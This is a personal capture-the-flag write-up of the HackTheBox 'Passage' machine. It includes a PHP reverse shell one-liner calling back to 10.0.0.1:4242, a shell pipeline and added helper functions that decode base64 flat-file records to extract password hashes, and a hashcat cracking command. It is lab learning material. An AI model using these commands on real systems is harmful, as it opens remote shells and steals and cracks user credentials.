🚒Passage

https://app.hackthebox.com/machines/Passage

We find 2 TCP ports open:

On the web page we see the following information ->

Fail2ban is anti-brute-force software:

So basically, running gobuster got my IP banned, so I'm going to be cautious when it comes to finding subdirectories

Through enumeration, I find that it's CuteNews 2.1.2 running, with a known CVE ->

Very straightforward CVE

We see some PHP files

So with a quick PHP reverse shell ->

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

We get a more stable shell

After enumerating a bit, we find where the flat files that cuteCMS uses as a "database" are stored

So we see this is base64 encoded:

After looking up a write-up to see how a pro would get through all of this quickly, I found this crazy one-liner that got me thinking I should start learning those:

for f in *; do cat $f | grep -v 'php die'; echo; done | grep . | while read line; do echo $line | base64 -d; echo; done | grep '"pass"'

Explanation:

  1. Loop Over Files:

    for f in *; do

    This loop iterates over all files in the current directory (using * to match all filenames).

  2. Process Each File:

    cat $f | grep -v 'php die'; echo;

    For each file, it:

    • Uses cat $f to read the content of the file.

    • Pipes the content to grep -v 'php die', which filters out any lines containing the string 'php die'.

    • Uses echo to add a newline after processing each file.

  3. Concatenate and Filter Non-Empty Lines:

    done | grep . |

    After processing all files, done ends the loop. The output is then piped to grep ., which filters out any empty lines (only lines containing at least one character are kept).

  4. Read and Decode Each Line:

    while read line; do echo $line | base64 -d; echo; done |

    This while loop reads each non-empty line:

    • read line reads a line into the variable line.

    • echo $line | base64 -d decodes the line from base64 encoding.

    • echo adds a newline after each decoded line.

Since we looked at the home directory and saw a paul user, we could guess that this user is the pivoting path, so I added a grep "paul" to the one-liner as my contribution

I took this hash, looked it up, and saw it was mode 1400 in hashcat ->
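The same decode-and-filter pipeline as a reusable shell function (an added example, not from the original write-up): it quotes file names, drops lines that are not valid base64 instead of printing garbage, and takes the user name as an optional second filter. The function names are hypothetical, and the sample files and their record layout are constructed for illustration.

```shell
# Added example. Sample data is constructed; the record layout is an assumption.
# Usage: decode_flat_records DIR [USER]
decode_flat_records() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue               # skip directories and an unmatched glob
        # IFS= and -r keep the line intact; "|| [ -n ... ]" also reads a last
        # line that has no trailing newline
        while IFS= read -r line || [ -n "$line" ]; do
            case $line in
                ''|*'php die'*) continue ;;   # blank lines and the PHP guard line
            esac
            # base64 -d exits non-zero on invalid input: drop that line entirely
            decoded=$(printf '%s' "$line" | base64 -d 2>/dev/null) || continue
            printf '%s\n' "$decoded"
        done < "$f"
    # keep records with a "pass" field, then (optionally) only the named user
    done | grep -F -- '"pass"' | grep -F -- "${2:-pass}" || true
}

# Encode a string as single-line base64 (used only to build the sample files)
enc() { printf '%s' "$1" | base64 | tr -d '\n'; }

# Build a temporary directory of constructed flat files and print its path
make_sample_dir() {
    d=$(mktemp -d)
    {
        echo '<?php die; ?>'
        enc 's:4:"name";s:4:"paul";s:4:"pass";s:16:"CONSTRUCTED-HASH";'; echo
        echo '!!!not-base64!!!'
        enc 's:5:"email";s:16:"paul@example.org";'; echo
    } > "$d/users a.php"
    # second file: file name with a space, no newline after the last record
    { echo '<?php die; ?>'
      enc 's:4:"name";s:5:"alice";s:4:"pass";s:5:"OTHER";'; } > "$d/users b.php"
    printf '%s\n' "$d"
}
```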

hashcat -m 1400 hash.txt /usr/share/wordlists/rockyou.txt

I could not change user with my low-interaction shell, so I did a tty upgrade ->

And we connect

We quickly find an SSH authorization key:

We copy the id_rsa key and connect as the nadav user ->

We'll get root tomorrow
